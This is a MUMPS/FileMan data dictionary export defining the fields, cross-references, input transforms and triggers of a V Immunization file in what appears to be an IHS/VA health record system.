S:$P($G(^AUTTSITE(1,0)),U,19)="Y" ^BIVIMMD("AQ",(X_";"_$P($G(^BIVIMMD(DA,0)),U,4)),DA)=""
"^DD",9002084.118,9002084.118,.01,1,4,2)
K:$P($G(^AUTTSITE(1,0)),U,19)="Y" ^BIVIMMD("AQ",(X_";"_$P($G(^BIVIMMD(DA,0)),U,4)),DA),^BIVIMMD("AQ",(X_";"),DA)
"^DD",9002084.118,9002084.118,.01,1,4,"%D",0)
^^1^1^2980320^^^^
"^DD",9002084.118,9002084.118,.01,1,4,"%D",1,0)
Q-MAN XREF
"^DD",9002084.118,9002084.118,.01,1,4,"DT")
2940803
"^DD",9002084.118,9002084.118,.01,3)
Enter the name of the immunization given to the patient.
"^DD",9002084.118,9002084.118,.01,21,0)
^.001^2^2^3050113^^^
"^DD",9002084.118,9002084.118,.01,21,1,0)
This is the type of immunization that was given to the patient at the
"^DD",9002084.118,9002084.118,.01,21,2,0)
encounter.
"^DD",9002084.118,9002084.118,.01,23,0)
^.001^3^3^3050113^^^^
"^DD",9002084.118,9002084.118,.01,23,1,0)
Entries in the Immunization File (#9999999.14) may be made inactive.
"^DD",9002084.118,9002084.118,.01,23,2,0)
Inactive entries cannot be selected.
"^DD",9002084.118,9002084.118,.01,23,3,0)
APCDALVR Variable = APCDALVR("APCDTIMM")
"^DD",9002084.118,9002084.118,.01,"AUDIT")
n
"^DD",9002084.118,9002084.118,.01,"DT")
3130506
"^DD",9002084.118,9002084.118,.02,0)
PATIENT NAME^RP9000001'I^AUPNPAT(^0;2^Q
"^DD",9002084.118,9002084.118,.02,1,0)
^.1
"^DD",9002084.118,9002084.118,.02,1,1,0)
9002084.118^AC
"^DD",9002084.118,9002084.118,.02,1,1,1)
S ^BIVIMMD("AC",$E(X,1,30),DA)=""
"^DD",9002084.118,9002084.118,.02,1,1,2)
K ^BIVIMMD("AC",$E(X,1,30),DA)
"^DD",9002084.118,9002084.118,.02,1,2,0)
9002084.118^AATOO2^MUMPS
"^DD",9002084.118,9002084.118,.02,1,2,1)
I $P(^BIVIMMD(DA,0),U,3)]"" S ^BIVIMMD("AA",X,+^BIVIMMD(DA,0),(9999999-$P(+^AUPNVSIT($P(^BIVIMMD(DA,0),U,3),0),".",1)),DA)=""
"^DD",9002084.118,9002084.118,.02,1,2,2)
I $P(^BIVIMMD(DA,0),U,3)]"" K ^BIVIMMD("AA",X,+^BIVIMMD(DA,0),(9999999-$P(+^AUPNVSIT($P(^BIVIMMD(DA,0),U,3),0),".",1)),DA)
"^DD",9002084.118,9002084.118,.02,23,0)
^^1^1^2960924^
"^DD",9002084.118,9002084.118,.02,23,1,0)
APCDALVR Variable = APCDALVR("APCDPAT")
"^DD",9002084.118,9002084.118,.02,"DT")
2880405
"^DD",9002084.118,9002084.118,.03,0)
VISIT^R*P9000010'I^AUPNVSIT(^0;3^S DIC("S")="I $P(^(0),U,5)=$P(^BIVIMMD(DA,0),U,2)" D ^DIC K DIC S DIC=DIE,X=+Y K:Y<0 X
"^DD",9002084.118,9002084.118,.03,1,0)
^.1
"^DD",9002084.118,9002084.118,.03,1,1,0)
9002084.118^AD
"^DD",9002084.118,9002084.118,.03,1,1,1)
S ^BIVIMMD("AD",$E(X,1,30),DA)=""
"^DD",9002084.118,9002084.118,.03,1,1,2)
K ^BIVIMMD("AD",$E(X,1,30),DA)
"^DD",9002084.118,9002084.118,.03,1,1,"%D",0)
^^4^4^2950901^
"^DD",9002084.118,9002084.118,.03,1,1,"%D",1,0)
This cross-reference is used for searches by the visit pointer and
"^DD",9002084.118,9002084.118,.03,1,1,"%D",2,0)
internal entry number.
"^DD",9002084.118,9002084.118,.03,1,1,"%D",3,0)
"^DD",9002084.118,9002084.118,.03,1,1,"%D",4,0)
"AD",VISIT pointer, DA
"^DD",9002084.118,9002084.118,.03,1,2,0)
9002084.118^AA^MUMPS
"^DD",9002084.118,9002084.118,.03,1,2,1)
Q:$P(^BIVIMMD(DA,0),U,2)="" S ^BIVIMMD("AA",$P(^BIVIMMD(DA,0),U,2),+^BIVIMMD(DA,0),(9999999-$P(+^AUPNVSIT(X,0),".",1)),DA)=""
"^DD",9002084.118,9002084.118,.03,1,2,2)
Q:$P(^BIVIMMD(DA,0),U,2)="" K ^BIVIMMD("AA",$P(^BIVIMMD(DA,0),U,2),+^BIVIMMD(DA,0),(9999999-$P(+^AUPNVSIT(X,0),".",1)),DA)
"^DD",9002084.118,9002084.118,.03,1,2,"%D",0)
^^4^4^2950901^
"^DD",9002084.118,9002084.118,.03,1,2,"%D",1,0)
This crossreference is used for searches in sequence by patient,
"^DD",9002084.118,9002084.118,.03,1,2,"%D",2,0)
Immunization pointer, inverted visit date, and internal entry number.
"^DD",9002084.118,9002084.118,.03,1,2,"%D",3,0)
"^DD",9002084.118,9002084.118,.03,1,2,"%D",4,0)
"AA",PATIENT,IMMUNIZATION,VISIT,DA
"^DD",9002084.118,9002084.118,.03,1,3,0)
9002084.118^AV10^MUMPS
"^DD",9002084.118,9002084.118,.03,1,3,1)
D ADD^AUPNVSIT
"^DD",9002084.118,9002084.118,.03,1,3,2)
D SUB^AUPNVSIT
"^DD",9002084.118,9002084.118,.03,1,3,"%D",0)
^^2^2^2940127^^
"^DD",9002084.118,9002084.118,.03,1,3,"%D",1,0)
This cross-reference adds and subtracts from the dependent entry count in
"^DD",9002084.118,9002084.118,.03,1,3,"%D",2,0)
the VISIT file.
"^DD",9002084.118,9002084.118,.03,1,4,0)
9002084.118^ADT^MUMPS
"^DD",9002084.118,9002084.118,.03,1,4,1)
S ^BIVIMMD("ADT",$P(+^AUPNVSIT(X,0),"."),X,DA)=""
"^DD",9002084.118,9002084.118,.03,1,4,2)
K ^BIVIMMD("ADT",$P(+^AUPNVSIT(X,0),"."),X,DA)
"^DD",9002084.118,9002084.118,.03,1,4,"DT")
2960507
"^DD",9002084.118,9002084.118,.03,3)
Enter the visit date/time for the encounter where the immunization was given.
"^DD",9002084.118,9002084.118,.03,12)
VISIT MUST BE FOR CURRENT PATIENT
"^DD",9002084.118,9002084.118,.03,12.1)
S DIC("S")="I $P(^(0),U,5)=$P(^BIVIMMD(DA,0),U,2)"
"^DD",9002084.118,9002084.118,.03,21,0)
^^2^2^2950901^
"^DD",9002084.118,9002084.118,.03,21,1,0)
This is the encounter defined in the Visit file that represents when and
"^DD",9002084.118,9002084.118,.03,21,2,0)
where the immunization was given.
"^DD",9002084.118,9002084.118,.03,23,0)
^^3^3^2960924^
"^DD",9002084.118,9002084.118,.03,23,1,0)
This is a pointer to the Visit File (#9000010). This field is stuffed by
"^DD",9002084.118,9002084.118,.03,23,2,0)
the applications. No editing is allowed.
"^DD",9002084.118,9002084.118,.03,23,3,0)
APCDALVR Variable = APCDALVR("APCDVSIT")
"^DD",9002084.118,9002084.118,.03,"DT")
2890608
"^DD",9002084.118,9002084.118,.04,0)
SERIES^S^P:PARTIALLY COMPLETE;C:COMPLETE;B:BOOSTER;1:SERIES 1;2:SERIES 2;3:SERIES 3;4:SERIES 4;5:SERIES 5;6:SERIES 6;7:SERIES 7;8:SERIES 8;^0;4^Q
"^DD",9002084.118,9002084.118,.04,1,0)
^.1^^0
"^DD",9002084.118,9002084.118,.04,1,1,0)
9002084.118^AQ^MUMPS
"^DD",9002084.118,9002084.118,.04,1,1,1)
N % S %=$S($P($G(^AUTTSITE(1,0)),U,19)="Y":1,1:0) K:% ^BIVIMMD("AQ",$P(^BIVIMMD(DA,0),U)_";",DA) S:% ^BIVIMMD("AQ",($P(^BIVIMMD(DA,0),U)_";"_X),DA)=""
"^DD",9002084.118,9002084.118,.04,1,1,2)
N % S %=$S($P($G(^AUTTSITE(1,0)),U,19)="Y":1,1:0) K:% ^BIVIMMD("AQ",($P(^BIVIMMD(DA,0),U)_";"_X),DA) S:% ^BIVIMMD("AQ",($P(^BIVIMMD(DA,0),U)_";"),DA)=""
"^DD",9002084.118,9002084.118,.04,1,1,"%D",0)
^^1^1^2940803^^^^
"^DD",9002084.118,9002084.118,.04,1,1,"%D",1,0)
Q-MAN XREF
"^DD",9002084.118,9002084.118,.04,1,1,"DT")
2940803
"^DD",9002084.118,9002084.118,.04,3)
Enter the series number, booster, partial or complete.
"^DD",9002084.118,9002084.118,.04,21,0)
^^2^2^2950901^
"^DD",9002084.118,9002084.118,.04,21,1,0)
This field allows the provider to specify which series of immunization
"^DD",9002084.118,9002084.118,.04,21,2,0)
type was given to the patient.
"^DD",9002084.118,9002084.118,.04,23,0)
^^1^1^2960924^
"^DD",9002084.118,9002084.118,.04,23,1,0)
APCDALVR Variable = APCDALVR("APCDTSER")
"^DD",9002084.118,9002084.118,.04,"DT")
2950901
"^DD",9002084.118,9002084.118,.05,0)
LOT^*P9999999.41'^AUTTIML(^0;5^S DIC("S")="I $P(^(0),U,3)=0,$D(^AUTTIML(""C"",$P(^BIVIMMD(DA,0),U,1),Y))" D ^DIC K DIC S DIC=DIE,X=+Y K:Y<0 X
"^DD",9002084.118,9002084.118,.05,12)
LOT MUST BE AVAILABLE AND MUST BE A VALID LOT FOR THE IMMUNIZATION BEING ENTERED.
"^DD",9002084.118,9002084.118,.05,12.1)
S DIC("S")="I $P(^(0),U,3)=0,$D(^AUTTIML(""C"",$P(^BIVIMMD(DA,0),U,1),Y))"
"^DD",9002084.118,9002084.118,.05,23,0)
^^1^1^2960924^
"^DD",9002084.118,9002084.118,.05,23,1,0)
APCDALVR Variable = APCDALVR("APCDTLOT")
"^DD",9002084.118,9002084.118,.05,"DT")
2890816
"^DD",9002084.118,9002084.118,.06,0)
REACTION^P9002084.8'^BIREC(^0;6^Q
"^DD",9002084.118,9002084.118,.06,3)
Enter the number representing the patients reaction to the immunization.
"^DD",9002084.118,9002084.118,.06,21,0)
^^2^2^2950901^
"^DD",9002084.118,9002084.118,.06,21,1,0)
This is the reaction that may have been observed by the provider as a
"^DD",9002084.118,9002084.118,.06,21,2,0)
result of the immunization given.
"^DD",9002084.118,9002084.118,.06,23,0)
^^1^1^2960924^
"^DD",9002084.118,9002084.118,.06,23,1,0)
APCDALVR Variable = APCDALVR("APCDTREC")
"^DD",9002084.118,9002084.118,.06,"DT")
3030826
"^DD",9002084.118,9002084.118,.07,0)
*CONTRAINDICATED^S^1:YES (DO NOT REPEAT THIS VACCINE).;0:NO (OK TO USE IN THE FUTURE);^0;7^Q
"^DD",9002084.118,9002084.118,.07,3)
Enter 1 if this immunization should not be given to the patient in the future.
"^DD",9002084.118,9002084.118,.07,21,0)
^^3^3^2950901^
"^DD",9002084.118,9002084.118,.07,21,1,0)
This field allows the immunization to be recorded as contraindicated.
"^DD",9002084.118,9002084.118,.07,21,2,0)
Reminders will include a check to see if the previous immunization was
"^DD",9002084.118,9002084.118,.07,21,3,0)
contraindicated before creating reminders.
"^DD",9002084.118,9002084.118,.07,23,0)
^^1^1^2960924^
"^DD",9002084.118,9002084.118,.07,23,1,0)
APCDALVR Variable = APCDALVR("APCDTCON")
"^DD",9002084.118,9002084.118,.07,"DT")
2981008
"^DD",9002084.118,9002084.118,.08,0)
DOSE OVERRIDE^S^0:@;1:INVALID--BAD STORAGE;2:INVALID--DEFECTIVE;3:INVALID--EXPIRED;4:INVALID--ADMIN ERROR;9:FORCED VALID;^0;8^Q
"^DD",9002084.118,9002084.118,.08,"DT")
3050113
"^DD",9002084.118,9002084.118,.09,0)
INJECTION SITE^S^LTI:Left Thigh IM;LTS:Left Thigh SQ;RTI:Right Thigh IM;RTS:Right Thigh SQ;BTI:Both Thighs IM;LDI:Left Deltoid IM;LAS:Left Arm SQ;RDI:Right Deltoid IM;RAS:Right Arm SQ;O:Oral;IN:Intranasal;LID:Left Arm Intradermal;RID:Right Arm Intradermal;^0;9^Q
"^DD",9002084.118,9002084.118,.09,3)
ENTER THE BODY SITE WHERE THE INJECTION WAS GIVEN.
"^DD",9002084.118,9002084.118,.09,"DT")
3110531
"^DD",9002084.118,9002084.118,.11,0)
VOLUME^NJ4,2^^0;11^K:+X'=X!(X>5)!(X<0)!(X?.E1"."3N.N) X
"^DD",9002084.118,9002084.118,.11,3)
Type a Number between 0 and 5, 2 Decimal Digits
"^DD",9002084.118,9002084.118,.11,"DT")
3030827
"^DD",9002084.118,9002084.118,.12,0)
DATE OF VAC INFO STATEMENT^D^^0;12^S %DT="EX" D ^%DT S X=Y K:Y<1 X
"^DD",9002084.118,9002084.118,.12,"DT")
2981008
"^DD",9002084.118,9002084.118,.13,0)
CREATED BY V CPT ENTRY^NJ9,0^^0;13^K:+X'=X!(X>999999999)!(X<0)!(X?.E1"."1N.N) X
"^DD",9002084.118,9002084.118,.13,3)
Enter the IEN of the V CPT entry that created this V Immunization.
"^DD",9002084.118,9002084.118,.13,"DT")
3050814
"^DD",9002084.118,9002084.118,.14,0)
VAC ELIGIBILITY^P9002084.83'^BIELIG(^0;14^Q
"^DD",9002084.118,9002084.118,.14,3)
Enter the patient's VFC Eligibility on this visit.
"^DD",9002084.118,9002084.118,.14,"DT")
3120830
"^DD",9002084.118,9002084.118,.15,0)
IMPORT FROM OUTSIDE REGISTRY^S^1:IMPORTED;0:NOT IMPORTED;2:EDITED AFTER IMPORT;^0;15^Q
"^DD",9002084.118,9002084.118,.15,3)
Enter 1 if this immunization was imported from an outside registry.
"^DD",9002084.118,9002084.118,.15,"DT")
3100222
"^DD",9002084.118,9002084.118,.16,0)
NDC^P9002084.95'^BINDC(^0;16^Q
"^DD",9002084.118,9002084.118,.16,3)
Select the NDC Code for this immunization. Enter
"^DD",9002084.118,9002084.118,.16,"DT")
3110817
"^DD",9002084.118,9002084.118,1,0)
ADMINISTRATIVE NOTES^F^^1;1^K:$L(X)>160!($L(X)<1) X
"^DD",9002084.118,9002084.118,1,3)
Answer must be 1-160 characters in length
"^DD",9002084.118,9002084.118,1,"DT")
3130524
"^DD",9002084.118,9002084.118,2.01,0)
IMMUNIZATION DELETED BY^P200'^VA(200,^2;1^Q
"^DD",9002084.118,9002084.118,2.01,"DT")
3130529
"^DD",9002084.118,9002084.118,2.02,0)
DATE/TIME IMMUNIZATION DELETED^D^^2;2^S %DT="ESTX" D ^%DT S X=Y K:X<1 X
"^DD",9002084.118,9002084.118,2.02,3)
(No range limit on date)
"^DD",9002084.118,9002084.118,2.02,"DT")
3130529
"^DD",9002084.118,9002084.118,2.03,0)
REASON IMMUNIZATION DELETED^S^d:Duplicate;e:Entered in Error;o:Other;^812;4^Q
"^DD",9002084.118,9002084.118,2.03,"DT")
3130529
"^DD",9002084.118,9002084.118,2.04,0)
REASON IF OTHER^F^^2;4^K:$L(X)>100!($L(X)<2) X
"^DD",9002084.118,9002084.118,2.04,3)
Answer must be 2-100 characters in length
"^DD",9002084.118,9002084.118,2.04,"DT")
3130529
"^DD",9002084.118,9002084.118,1101,0)
REMARKS^9002084.1191^^11;0
"^DD",9002084.118,9002084.118,1201,0)
EVENT DATE AND TIME^D^^12;1^S %DT="EST" D ^%DT S X=Y K:Y<1 X
"^DD",9002084.118,9002084.118,1201,3)
Enter the date and time the immunization was given.
"^DD",9002084.118,9002084.118,1201,21,0)
^^9^9^2950901^^^^
"^DD",9002084.118,9002084.118,1201,21,1,0)
This is the date and time the immunization was given. This date and time
"^DD",9002084.118,9002084.118,1201,21,2,0)
may be different from the visit date and time. For example, for clinic
"^DD",9002084.118,9002084.118,1201,21,3,0)
appointment visits, the visit date and time is the date and time of the
"^DD",9002084.118,9002084.118,1201,21,4,0)
appointment, not the time the provider performed the clinical event.
"^DD",9002084.118,9002084.118,1201,21,5,0)
"^DD",9002084.118,9002084.118,1201,21,6,0)
The date may be an imprecise date.
"^DD",9002084.118,9002084.118,1201,21,7,0)
"^DD",9002084.118,9002084.118,1201,21,8,0)
Date and time may be within 30 days before of after the visit date, with the
"^DD",9002084.118,9002084.118,1201,21,9,0)
restriction the date cannot be a future date.
"^DD",9002084.118,9002084.118,1201,23,0)
^^14^14^2960924^
"^DD",9002084.118,9002084.118,1201,23,1,0)
The PCE User Interface, which allows manual entry of data, will be the primary
"^DD",9002084.118,9002084.118,1201,23,2,0)
source of the immunization date and time. The immunization date prompt defaults
"^DD",9002084.118,9002084.118,1201,23,3,0)
to the visit date and the time is entered to reflect the actual time the
"^DD",9002084.118,9002084.118,1201,23,4,0)
immunization was given. The immunization date does not have to be the visit
"^DD",9002084.118,9002084.118,1201,23,5,0)
date, but it must be within 30 days before or after the visit, and not be a
"^DD",9002084.118,9002084.118,1201,23,6,0)
future date.
"^DD",9002084.118,9002084.118,1201,23,7,0)
"^DD",9002084.118,9002084.118,1201,23,8,0)
If the user wants to enter an historical immunization, the user should use the
"^DD",9002084.118,9002084.118,1201,23,9,0)
Historical Encounter entry action to document the historical immunization.
"^DD",9002084.118,9002084.118,1201,23,10,0)
Historical entries will not be eligible for credit.
"^DD",9002084.118,9002084.118,1201,23,11,0)
"^DD",9002084.118,9002084.118,1201,23,12,0)
PCE data sources for automatic (scanning) data capture will be blank unless the
"^DD",9002084.118,9002084.118,1201,23,13,0)
immunization date and time are passed to PCE for filing.
"^DD",9002084.118,9002084.118,1201,23,14,0)
APCDALVR Variable = APCDALVR("APCDTCDT")
"^DD",9002084.118,9002084.118,1201,"DT")
2940401
"^DD",9002084.118,9002084.118,1202,0)
ORDERING PROVIDER^*P200'X^VA(200,^12;2^S DIC("S")="I $D(^VA(200,""AK.PROVIDER"",$P(^(0),U)))",D="AK.PROVIDER" D IX^DIC K DIC S DIC=DIE,X=+Y K:Y<0 X
"^DD",9002084.118,9002084.118,1202,3)
Enter the provider who ordered this immunization.
"^DD",9002084.118,9002084.118,1202,12)
Select the ordering Provider
"^DD",9002084.118,9002084.118,1202,12.1)
S DIC("S")="I $D(^VA(200,""AK.PROVIDER"",$P(^(0),U)))"
"^DD",9002084.118,9002084.118,1202,21,0)
^^1^1^2950901^^
"^DD",9002084.118,9002084.118,1202,21,1,0)
The field can be used to document the provider who ordered the immunization.
"^DD",9002084.118,9002084.118,1202,23,0)
^^2^2^2960924^
"^DD",9002084.118,9002084.118,1202,23,1,0)
The person entered here must hold the "AK.PROVIDER" security key.
"^DD",9002084.118,9002084.118,1202,23,2,0)
APCDALVR Variable = APCDALVR("APCDTPRV")
"^DD",9002084.118,9002084.118,1202,"DT")
2940425
"^DD",9002084.118,9002084.118,1203,0)
CLINIC^P40.7'^DIC(40.7,^12;3^Q
"^DD",9002084.118,9002084.118,1203,23,0)
^^1^1^2960924^
"^DD",9002084.118,9002084.118,1203,23,1,0)
APCDALVR Variable = APCDALVR("APCDTCLN")
"^DD",9002084.118,9002084.118,1203,"DT")
2960709
"^DD",9002084.118,9002084.118,1204,0)
ENCOUNTER PROVIDER^P200'^VA(200,^12;4^Q
"^DD",9002084.118,9002084.118,1204,3)
Enter the provider who gave the immunization.
"^DD",9002084.118,9002084.118,1204,21,0)
^^1^1^2950901^^^
"^DD",9002084.118,9002084.118,1204,21,1,0)
This is the provider who gave the immunization.
"^DD",9002084.118,9002084.118,1204,23,0)
^^3^3^2960924^
"^DD",9002084.118,9002084.118,1204,23,1,0)
This person can be any person in the new person file. The person does not have
"^DD",9002084.118,9002084.118,1204,23,2,0)
to hold the "AK.PROVIDER" security key.
"^DD",9002084.118,9002084.118,1204,23,3,0)
APCDALVR Variable = APCDALVR("APCDTEPR")
"^DD",9002084.118,9002084.118,1204,"DT")
2941219
"^DD",9002084.118,9002084.118,1208,0)
PARENT^P9002084.118'^BIVIMMD(^12;8^Q
"^DD",9002084.118,9002084.118,1208,23,0)
^^1^1^2960924^
"^DD",9002084.118,9002084.118,1208,23,1,0)
APCDALVR Variable = APCDALVR("APCDTPNT")
"^DD",9002084.118,9002084.118,1208,"DT")
2960709
"^DD",9002084.118,9002084.118,1209,0)
EXTERNAL KEY^F^^12;9^K:$L(X)>20!($L(X)<1) X
"^DD",9002084.118,9002084.118,1209,3)
Answer must be 1-20 characters in length.
"^DD",9002084.118,9002084.118,1209,23,0)
^^1^1^2960924^
"^DD",9002084.118,9002084.118,1209,23,1,0)
APCDALVR Variable = APCDALVR("APCDTEXK")
"^DD",9002084.118,9002084.118,1209,"DT")
2960925
"^DD",9002084.118,9002084.118,1210,0)
OUTSIDE PROVIDER NAME^F^^12;10^K:$L(X)>30!($L(X)<1) X
"^DD",9002084.118,9002084.118,1210,3)
Answer must be 1-30 characters in length.
"^DD",9002084.118,9002084.118,1210,23,0)
^^1^1^2960924^
"^DD",9002084.118,9002084.118,1210,23,1,0)
APCDALVR Variable = APCDALVR("APCDTOPR")
"^DD",9002084.118,9002084.118,1210,"DT")
2960925
"^DD",9002084.118,9002084.118,1213,0)
ANCILLARY POV^P80'^ICD9(^12;13^Q
"^DD",9002084.118,9002084.118,1213,"DT")
3030919
"^DD",9002084.118,9002084.118,1214,0)
USER LAST UPDATE^P200'^VA(200,^12;14^Q
"^DD",9002084.118,9002084.118,1214,"DT")
3070110
"^DD",9002084.118,9002084.118,1215,0)
ORDERING LOCATION^P44'^SC(^12;15^Q
"^DD",9002084.118,9002084.118,1215,"DT")
3080219
"^DD",9002084.118,9002084.118,1216,0)
DATE/TIME ENTERED^D^^12;16^S %DT="ESTXR" D ^%DT S X=Y K:Y<1 X
"^DD",9002084.118,9002084.118,1216,1,0)
^.1
"^DD",9002084.118,9002084.118,1216,1,1,0)
^^TRIGGER^9002084.118^1217
"^DD",9002084.118,9002084.118,1216,1,1,1)
K DIV S DIV=X,D0=DA,DIV(0)=D0 S Y(1)=$S($D(^BIVIMMD(D0,12)):^(12),1:"") S X=$P(Y(1),U,17),X=X S DIU=X K Y S X=DIV I '$G(APCDVMUX) S X=DUZ X ^DD(9002084.118,1216,1,1,1.4)
"^DD",9002084.118,9002084.118,1216,1,1,1.4)
S DIH=$G(^BIVIMMD(DIV(0),12)),DIV=X S $P(^(12),U,17)=DIV,DIH=9002084.118,DIG=1217 D ^DICR
"^DD",9002084.118,9002084.118,1216,1,1,2)
Q
"^DD",9002084.118,9002084.118,1216,1,1,"CREATE VALUE")
I '$G(APCDVMUX) S X=DUZ
"^DD",9002084.118,9002084.118,1216,1,1,"DELETE VALUE")
NO EFFECT
"^DD",9002084.118,9002084.118,1216,1,1,"DT")
3120423
"^DD",9002084.118,9002084.118,1216,1,1,"FIELD")
#1217
"^DD",9002084.118,9002084.118,1216,1,2,0)
^^TRIGGER^9002084.118^1218
"^DD",9002084.118,9002084.118,1216,1,2,1)
K DIV S DIV=X,D0=DA,DIV(0)=D0 S Y(1)=$S($D(^BIVIMMD(D0,12)):^(12),1:"") S X=$P(Y(1),U,18),X=X S DIU=X K Y S X=DIV I '$G(APCDVMUX) S X=$$NOW^XLFDT X ^DD(9002084.118,1216,1,2,1.4)
"^DD",9002084.118,9002084.118,1216,1,2,1.4)
S DIH=$G(^BIVIMMD(DIV(0),12)),DIV=X S $P(^(12),U,18)=DIV,DIH=9002084.118,DIG=1218 D ^DICR
"^DD",9002084.118,9002084.118,1216,1,2,2)
Q
"^DD",9002084.118,9002084.118,1216,1,2,"CREATE VALUE")
I '$G(APCDVMUX) S X=$$NOW^XLFDT
"^DD",9002084.118,9002084.118,1216,1,2,"DELETE VALUE")
NO EFFECT
"^DD",9002084.118,9002084.118,1216,1,2,"DT")
3120423
"^DD",9002084.118,9002084.118,1216,1,2,"FIELD")
#1218
"^DD",9002084.118,9002084.118,1216,"DT")
3120423
"^DD",9002084.118,9002084.118,1217,0)
ENTERED BY^P200'^VA(200,^12;17^Q
"^DD",9002084.118,9002084.118,1217,5,1,0)
9002084.118^1216^1
"^DD",9002084.118,9002084.118,1217,"DT")
3120301
"^DD",9002084.118,9002084.118,1218,0)
DATE/TIME LAST MODIFIED^D^^12;18^S %DT="ESTXR" D ^%DT S X=Y K:Y<1 X
"^DD",9002084.118,9002084.118,1218,1,0)
^.1
"^DD",9002084.118,9002084.118,1218,1,1,0)
^^TRIGGER^9002084.118^1219
"^DD",9002084.118,9002084.118,1218,1,1,1)
K DIV S DIV=X,D0=DA,DIV(0)=D0 S Y(1)=$S($D(^BIVIMMD(D0,12)):^(12),1:"") S X=$P(Y(1),U,19),X=X S DIU=X K Y S X=DIV I '$G(APCDVMUX) S X=DUZ X ^DD(9002084.118,1218,1,1,1.4)
"^DD",9002084.118,9002084.118,1218,1,1,1.4)
S DIH=$G(^BIVIMMD(DIV(0),12)),DIV=X S $P(^(12),U,19)=DIV,DIH=9002084.118,DIG=1219 D ^DICR
"^DD",9002084.118,9002084.118,1218,1,1,2)
Q
"^DD",9002084.118,9002084.118,1218,1,1,"CREATE VALUE")
I '$G(APCDVMUX) S X=DUZ
"^DD",9002084.118,9002084.118,1218,1,1,"DELETE VALUE")
NO EFFECT
"^DD",9002084.118,9002084.118,1218,1,1,"DT")
3120423
"^DD",9002084.118,9002084.118,1218,1,1,"FIELD")
#1219
"^DD",9002084.118,9002084.118,1218,5,1,0)
9002084.118^1216^2
"^DD",9002084.118,9002084.118,1218,"DT")
3120423
"^DD",9002084.118,9002084.118,1219,0)
LAST MODIFIED BY^P200'^VA(200,^12;19^Q
"^DD",9002084.118,9002084.118,1219,5,1,0)
9002084.118^1218^1
"^DD",9002084.118,9002084.118,1219,"DT")
3120301
"^DD",9002084.118,9002084.118,2601,0)
SNOMED CT^9002084.1206A^^26;0
"^DD",9002084.118,9002084.118,2701,0)
LOINC CODES^9002084.1207A^^27;0
"^DD",9002084.118,9002084.118,80101,0)
EDITED FLAG^S^1:EDITED;^801;1^Q
"^DD",9002084.118,9002084.118,80101,3)
Answer is automatically entered by PCE filing logic.
"^DD",9002084.118,9002084.118,80101,21,0)
^^2^2^2950901^^
"^DD",9002084.118,9002084.118,80101,21,1,0)
This field is automatically set to 1 if PCE detects that any original
"^DD",9002084.118,9002084.118,80101,21,2,0)
immunization data is being edited.
"^DD",9002084.118,9002084.118,80101,23,0)
^^2^2^2950901^^
"^DD",9002084.118,9002084.118,80101,23,1,0)
PCE filing logic automatically compares the before and after pictures of the
"^DD",9002084.118,9002084.118,80101,23,2,0)
record to determine if the edited flag should be set to "1".
"^DD",9002084.118,9002084.118,80101,"DT")
2940401
"^DD",9002084.118,9002084.118,80102,0)
AUDIT TRAIL^F^^801;2^K:$L(X)>85!($L(X)<2) X
"^DD",9002084.118,9002084.118,80102,3)
Answer is automatically entered by the PCE filing logic.
"^DD",9002084.118,9002084.118,80102,21,0)
^^3^3^2950901^^
"^DD",9002084.118,9002084.118,80102,21,1,0)
This field is populated automatically by the PCE filing logic. The format of
"^DD",9002084.118,9002084.118,80102,21,2,0)
the field is as follows: Pointer to PCE data source file_"-"_A for Add or E
"^DD",9002084.118,9002084.118,80102,21,3,0)
for Edit_" "_DUZ of the person who entred the data_";"...
"^DD",9002084.118,9002084.118,80102,23,0)
^^14^14^2950901^^
"^DD",9002084.118,9002084.118,80102,23,1,0)
The PCE filing logic requires a pointer to the PCE data source file. If this
"^DD",9002084.118,9002084.118,80102,23,2,0)
is not passed, the PCE filing logic will not process the data.
"^DD",9002084.118,9002084.118,80102,23,3,0)
"^DD",9002084.118,9002084.118,80102,23,4,0)
If the record is a new record, then an "A" is used to specify the source that
"^DD",9002084.118,9002084.118,80102,23,5,0)
added the data. If the record existed previously, PCE filing logic compares
"^DD",9002084.118,9002084.118,80102,23,6,0)
the old and new records of informtion. An "E" will be automatically used if
"^DD",9002084.118,9002084.118,80102,23,7,0)
the filing logic finds the data has been edited. If "E" is used, then the
"^DD",9002084.118,9002084.118,80102,23,8,0)
Edited Flag field is automatically set to 1.
"^DD",9002084.118,9002084.118,80102,23,9,0)
"^DD",9002084.118,9002084.118,80102,23,10,0)
The DUZ is stored in its internal format to represent the user who performed
"^DD",9002084.118,9002084.118,80102,23,11,0)
the adding or editing of data for this record.
"^DD",9002084.118,9002084.118,80102,23,12,0)
"^DD",9002084.118,9002084.118,80102,23,13,0)
Iterations of editing will be concatenated to the previous data source value,
"^DD",9002084.118,9002084.118,80102,23,14,0)
up to 85 characters.
"^DD",9002084.118,9002084.118,80102,"DT")
2960509
"^DD",9002084.118,9002084.118,81101,0)
COMMENTS^F^^811;1^K:$L(X)>245!($L(X)<1) X
"^DD",9002084.118,9002084.118,81101,3)
Enter a comment 1-245 characters in length.
"^DD",9002084.118,9002084.118,81101,21,0)
^^2^2^2950901^^
"^DD",9002084.118,9002084.118,81101,21,1,0)
This is a comment related to the patient's immunization. The provider may enter
"^DD",9002084.118,9002084.118,81101,21,2,0)
this manually via the PCE User Interface.
"^DD",9002084.118,9002084.118,81101,"DT")
2950711
"^DD",9002084.118,9002084.118,81201,0)
VERIFIED^SI^1:ELECTRONICALLY SIGNED;2:VERIFIED BY PACKAGE;^812;1^Q
"^DD",9002084.118,9002084.118,81201,"DT")
2960509
"^DD",9002084.118,9002084.118,81202,0)
PACKAGE^P9.4'I^DIC(9.4,^812;2^Q
"^DD",9002084.118,9002084.118,81202,"DT")
2960509
"^DD",9002084.118,9002084.118,81203,0)
DATA SOURCE^P839.7'I^PX(839.7,^812;3^Q
"^DD",9002084.118,9002084.118,81203,"DT")
2960509
"^DD",9002084.118,9002084.1191,0)
REMARKS SUB-FIELD^^.01^1
"^DD",9002084.118,9002084.1191,0,"NM","REMARKS")
"^DD",9002084.118,9002084.1191,0,"UP")
9002084.118
"^DD",9002084.118,9002084.1191,.01,0)
REMARKS^W^^0;1^Q
"^DD",9002084.118,9002084.1191,.01,"DT")
2861007
"^DD",9002084.118,9002084.1206,0)
SNOMED CT SUB-FIELD^^.019^2
"^DD",9002084.118,9002084.1206,0,"NM","SNOMED CT")
"^DD",9002084.118,9002084.1206,0,"UP")
9002084.118
"^DD",9002084.118,9002084.1206,.01,0)
SNOMED CT^F^^0;1^K:$L(X)>30!($L(X)<1) X
"^DD",9002084.118,9002084.1206,.01,1,0)
^.1
